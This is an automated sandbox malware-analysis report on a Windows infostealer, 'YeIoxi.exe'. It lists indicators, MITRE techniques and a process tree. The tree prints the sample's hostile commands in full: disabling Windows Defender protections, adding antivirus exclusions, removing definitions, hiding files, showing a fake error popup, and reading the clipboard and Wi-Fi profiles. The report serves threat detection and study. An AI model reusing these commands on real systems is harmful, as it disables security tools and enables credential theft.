25e5364b68dd722918c975cb1c14104bcca9bd74be7d34a80d6c7aa46e1093a4

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
24/04/2024, 17:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YeIoxi.exe
Size

6.0MB
MD5

b907fdffcf20892db3eeb81abb14930c
SHA1

ad94b36fbcc1a3ff67c5cb430915ffe29f095228
SHA256

25e5364b68dd722918c975cb1c14104bcca9bd74be7d34a80d6c7aa46e1093a4
SHA512

ef1670a4585d8525751d1a485c4a6684a8814d169aac5ff38c96d6b6df2ac003524917d96431947b7b5dc39392c752e930549da7ebcf74835924c54a289bdf36
SSDEEP

98304:RrMJEtdFBG9YamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R2OuAKkfePyyu:RrMIFE9ZeN/FJMIDJf0gsAGK4RFuAKkj

Score

8^/10

spyware stealer upx

Malware Config

Signatures

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	YeIoxi.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
536	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe
3740	YeIoxi.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 46 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002342b-21.dat	upx
behavioral2/memory/3740-25-0x00007FFDCE3E0000-0x00007FFDCE84E000-memory.dmp	upx
behavioral2/files/0x000700000002341e-27.dat	upx
behavioral2/files/0x0007000000023429-29.dat	upx
behavioral2/memory/3740-31-0x00007FFDE0E20000-0x00007FFDE0E44000-memory.dmp	upx
behavioral2/memory/3740-48-0x00007FFDE3380000-0x00007FFDE338F000-memory.dmp	upx
behavioral2/files/0x0007000000023425-47.dat	upx
behavioral2/files/0x0007000000023424-46.dat	upx
behavioral2/files/0x0007000000023423-45.dat	upx
behavioral2/files/0x0007000000023422-44.dat	upx
behavioral2/files/0x0007000000023421-43.dat	upx
behavioral2/files/0x0007000000023420-42.dat	upx
behavioral2/files/0x000700000002341f-41.dat	upx
behavioral2/files/0x000800000002341a-40.dat	upx
behavioral2/files/0x0007000000023430-39.dat	upx
behavioral2/files/0x000700000002342f-38.dat	upx
behavioral2/files/0x000700000002342e-37.dat	upx
behavioral2/files/0x000700000002342a-34.dat	upx
behavioral2/files/0x0007000000023428-33.dat	upx
behavioral2/memory/3740-54-0x00007FFDDDB30000-0x00007FFDDDB5D000-memory.dmp	upx
behavioral2/memory/3740-56-0x00007FFDDDD80000-0x00007FFDDDD99000-memory.dmp	upx
behavioral2/memory/3740-59-0x00007FFDDDAA0000-0x00007FFDDDABF000-memory.dmp	upx
behavioral2/memory/3740-60-0x00007FFDDD610000-0x00007FFDDD781000-memory.dmp	upx
behavioral2/memory/3740-62-0x00007FFDDDA00000-0x00007FFDDDA19000-memory.dmp	upx
behavioral2/memory/3740-64-0x00007FFDE3370000-0x00007FFDE337D000-memory.dmp	upx
behavioral2/memory/3740-69-0x00007FFDDD9D0000-0x00007FFDDD9FE000-memory.dmp	upx
behavioral2/memory/3740-70-0x00007FFDCD9F0000-0x00007FFDCDD65000-memory.dmp	upx
behavioral2/memory/3740-72-0x00007FFDDD860000-0x00007FFDDD918000-memory.dmp	upx
behavioral2/memory/3740-74-0x00007FFDDD590000-0x00007FFDDD5A4000-memory.dmp	upx
behavioral2/memory/3740-77-0x00007FFDE14E0000-0x00007FFDE14ED000-memory.dmp	upx
behavioral2/memory/3740-76-0x00007FFDCE3E0000-0x00007FFDCE84E000-memory.dmp	upx
behavioral2/memory/3740-79-0x00007FFDCD8D0000-0x00007FFDCD9E8000-memory.dmp	upx
behavioral2/memory/3740-80-0x00007FFDE0E20000-0x00007FFDE0E44000-memory.dmp	upx
behavioral2/memory/3740-81-0x00007FFDDDB30000-0x00007FFDDDB5D000-memory.dmp	upx
behavioral2/memory/3740-111-0x00007FFDDDAA0000-0x00007FFDDDABF000-memory.dmp	upx
behavioral2/memory/3740-113-0x00007FFDDDA00000-0x00007FFDDDA19000-memory.dmp	upx
behavioral2/memory/3740-112-0x00007FFDDD610000-0x00007FFDDD781000-memory.dmp	upx
behavioral2/memory/3740-180-0x00007FFDDD9D0000-0x00007FFDDD9FE000-memory.dmp	upx
behavioral2/memory/3740-181-0x00007FFDCD9F0000-0x00007FFDCDD65000-memory.dmp	upx
behavioral2/memory/3740-183-0x00007FFDDD860000-0x00007FFDDD918000-memory.dmp	upx
behavioral2/memory/3740-330-0x00007FFDCE3E0000-0x00007FFDCE84E000-memory.dmp	upx
behavioral2/memory/3740-331-0x00007FFDE0E20000-0x00007FFDE0E44000-memory.dmp	upx
behavioral2/memory/3740-335-0x00007FFDDDAA0000-0x00007FFDDDABF000-memory.dmp	upx
behavioral2/memory/3740-336-0x00007FFDDD610000-0x00007FFDDD781000-memory.dmp	upx
behavioral2/memory/3740-406-0x00007FFDCE3E0000-0x00007FFDCE84E000-memory.dmp	upx
behavioral2/memory/3740-1009-0x00007FFDCD8D0000-0x00007FFDCD9E8000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
52	discord.com
53	discord.com
185	mediafire.com
186	mediafire.com
187	mediafire.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
49	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
516	WMIC.exe
184	WMIC.exe
3060	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
2656	tasklist.exe
4284	tasklist.exe
3952	tasklist.exe
3972	tasklist.exe
1068	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1960	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133584523463407781"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	firefox.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3716	PING.EXE

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
3788	powershell.exe
3788	powershell.exe
3788	powershell.exe
3060	powershell.exe
3060	powershell.exe
3060	powershell.exe
4436	powershell.exe
4436	powershell.exe
4436	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe
2780	powershell.exe
2780	powershell.exe
2780	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
3540	powershell.exe
3540	powershell.exe
3540	powershell.exe
3960	powershell.exe
3960	powershell.exe
3960	powershell.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
6420	msedge.exe
6420	msedge.exe
6292	msedge.exe
6292	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeIncreaseQuotaPrivilege	3008	WMIC.exe
Token: SeSecurityPrivilege	3008	WMIC.exe
Token: SeTakeOwnershipPrivilege	3008	WMIC.exe
Token: SeLoadDriverPrivilege	3008	WMIC.exe
Token: SeSystemProfilePrivilege	3008	WMIC.exe
Token: SeSystemtimePrivilege	3008	WMIC.exe
Token: SeProfSingleProcessPrivilege	3008	WMIC.exe
Token: SeIncBasePriorityPrivilege	3008	WMIC.exe
Token: SeCreatePagefilePrivilege	3008	WMIC.exe
Token: SeBackupPrivilege	3008	WMIC.exe
Token: SeRestorePrivilege	3008	WMIC.exe
Token: SeShutdownPrivilege	3008	WMIC.exe
Token: SeDebugPrivilege	3008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3008	WMIC.exe
Token: SeRemoteShutdownPrivilege	3008	WMIC.exe
Token: SeUndockPrivilege	3008	WMIC.exe
Token: SeManageVolumePrivilege	3008	WMIC.exe
Token: 33	3008	WMIC.exe
Token: 34	3008	WMIC.exe
Token: 35	3008	WMIC.exe
Token: 36	3008	WMIC.exe
Token: SeDebugPrivilege	3952	tasklist.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeIncreaseQuotaPrivilege	3008	WMIC.exe
Token: SeSecurityPrivilege	3008	WMIC.exe
Token: SeTakeOwnershipPrivilege	3008	WMIC.exe
Token: SeLoadDriverPrivilege	3008	WMIC.exe
Token: SeSystemProfilePrivilege	3008	WMIC.exe
Token: SeSystemtimePrivilege	3008	WMIC.exe
Token: SeProfSingleProcessPrivilege	3008	WMIC.exe
Token: SeIncBasePriorityPrivilege	3008	WMIC.exe
Token: SeCreatePagefilePrivilege	3008	WMIC.exe
Token: SeBackupPrivilege	3008	WMIC.exe
Token: SeRestorePrivilege	3008	WMIC.exe
Token: SeShutdownPrivilege	3008	WMIC.exe
Token: SeDebugPrivilege	3008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3008	WMIC.exe
Token: SeRemoteShutdownPrivilege	3008	WMIC.exe
Token: SeUndockPrivilege	3008	WMIC.exe
Token: SeManageVolumePrivilege	3008	WMIC.exe
Token: 33	3008	WMIC.exe
Token: 34	3008	WMIC.exe
Token: 35	3008	WMIC.exe
Token: 36	3008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	516	WMIC.exe
Token: SeSecurityPrivilege	516	WMIC.exe
Token: SeTakeOwnershipPrivilege	516	WMIC.exe
Token: SeLoadDriverPrivilege	516	WMIC.exe
Token: SeSystemProfilePrivilege	516	WMIC.exe
Token: SeSystemtimePrivilege	516	WMIC.exe
Token: SeProfSingleProcessPrivilege	516	WMIC.exe
Token: SeIncBasePriorityPrivilege	516	WMIC.exe
Token: SeCreatePagefilePrivilege	516	WMIC.exe
Token: SeBackupPrivilege	516	WMIC.exe
Token: SeRestorePrivilege	516	WMIC.exe
Token: SeShutdownPrivilege	516	WMIC.exe
Token: SeDebugPrivilege	516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	516	WMIC.exe
Token: SeRemoteShutdownPrivilege	516	WMIC.exe
Token: SeUndockPrivilege	516	WMIC.exe
Token: SeManageVolumePrivilege	516	WMIC.exe
Token: 33	516	WMIC.exe
Token: 34	516	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2376	firefox.exe
2376	firefox.exe
2376	firefox.exe
2376	firefox.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2376	firefox.exe
2376	firefox.exe
2376	firefox.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe
5548	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2376	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2460 wrote to memory of 3740	2460	YeIoxi.exe	84
PID 2460 wrote to memory of 3740	2460	YeIoxi.exe	84
PID 3740 wrote to memory of 4560	3740	YeIoxi.exe	87
PID 3740 wrote to memory of 4560	3740	YeIoxi.exe	87
PID 3740 wrote to memory of 4932	3740	YeIoxi.exe	88
PID 3740 wrote to memory of 4932	3740	YeIoxi.exe	88
PID 3740 wrote to memory of 3528	3740	YeIoxi.exe	89
PID 3740 wrote to memory of 3528	3740	YeIoxi.exe	89
PID 3740 wrote to memory of 2228	3740	YeIoxi.exe	92
PID 3740 wrote to memory of 2228	3740	YeIoxi.exe	92
PID 3740 wrote to memory of 668	3740	YeIoxi.exe	95
PID 3740 wrote to memory of 668	3740	YeIoxi.exe	95
PID 4932 wrote to memory of 3788	4932	cmd.exe	97
PID 4932 wrote to memory of 3788	4932	cmd.exe	97
PID 668 wrote to memory of 3008	668	cmd.exe	98
PID 668 wrote to memory of 3008	668	cmd.exe	98
PID 2228 wrote to memory of 3952	2228	cmd.exe	99
PID 2228 wrote to memory of 3952	2228	cmd.exe	99
PID 4560 wrote to memory of 3060	4560	cmd.exe	101
PID 4560 wrote to memory of 3060	4560	cmd.exe	101
PID 3528 wrote to memory of 392	3528	cmd.exe	100
PID 3528 wrote to memory of 392	3528	cmd.exe	100
PID 3740 wrote to memory of 3996	3740	YeIoxi.exe	103
PID 3740 wrote to memory of 3996	3740	YeIoxi.exe	103
PID 3996 wrote to memory of 1824	3996	cmd.exe	190
PID 3996 wrote to memory of 1824	3996	cmd.exe	190
PID 3740 wrote to memory of 1468	3740	YeIoxi.exe	107
PID 3740 wrote to memory of 1468	3740	YeIoxi.exe	107
PID 1468 wrote to memory of 436	1468	cmd.exe	109
PID 1468 wrote to memory of 436	1468	cmd.exe	109
PID 3740 wrote to memory of 2752	3740	YeIoxi.exe	110
PID 3740 wrote to memory of 2752	3740	YeIoxi.exe	110
PID 2752 wrote to memory of 516	2752	cmd.exe	112
PID 2752 wrote to memory of 516	2752	cmd.exe	112
PID 3740 wrote to memory of 2212	3740	YeIoxi.exe	186
PID 3740 wrote to memory of 2212	3740	YeIoxi.exe	186
PID 3740 wrote to memory of 4952	3740	YeIoxi.exe	116
PID 3740 wrote to memory of 4952	3740	YeIoxi.exe	116
PID 3740 wrote to memory of 2340	3740	YeIoxi.exe	118
PID 3740 wrote to memory of 2340	3740	YeIoxi.exe	118
PID 4952 wrote to memory of 3176	4952	cmd.exe	120
PID 4952 wrote to memory of 3176	4952	cmd.exe	120
PID 2340 wrote to memory of 4436	2340	cmd.exe	121
PID 2340 wrote to memory of 4436	2340	cmd.exe	121
PID 3740 wrote to memory of 4940	3740	YeIoxi.exe	123
PID 3740 wrote to memory of 4940	3740	YeIoxi.exe	123
PID 3740 wrote to memory of 752	3740	YeIoxi.exe	122
PID 3740 wrote to memory of 752	3740	YeIoxi.exe	122
PID 4940 wrote to memory of 3972	4940	cmd.exe	126
PID 4940 wrote to memory of 3972	4940	cmd.exe	126
PID 752 wrote to memory of 1068	752	cmd.exe	127
PID 752 wrote to memory of 1068	752	cmd.exe	127
PID 3740 wrote to memory of 4244	3740	YeIoxi.exe	128
PID 3740 wrote to memory of 4244	3740	YeIoxi.exe	128
PID 3740 wrote to memory of 548	3740	YeIoxi.exe	130
PID 3740 wrote to memory of 548	3740	YeIoxi.exe	130
PID 3740 wrote to memory of 1056	3740	YeIoxi.exe	131
PID 3740 wrote to memory of 1056	3740	YeIoxi.exe	131
PID 3740 wrote to memory of 1208	3740	YeIoxi.exe	133
PID 3740 wrote to memory of 1208	3740	YeIoxi.exe	133
PID 3740 wrote to memory of 5048	3740	YeIoxi.exe	136
PID 3740 wrote to memory of 5048	3740	YeIoxi.exe	136
PID 3740 wrote to memory of 3432	3740	YeIoxi.exe	132
PID 3740 wrote to memory of 3432	3740	YeIoxi.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3176	attrib.exe
3000	attrib.exe
668	attrib.exe

C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe
"C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2460
- C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe
  "C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()"
      4⤵
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3996
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1468
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe"
      4⤵
      Views/modifies file attributes
      PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏  ‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏  ‍.scr'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3432
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:1208
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5048
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:628
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 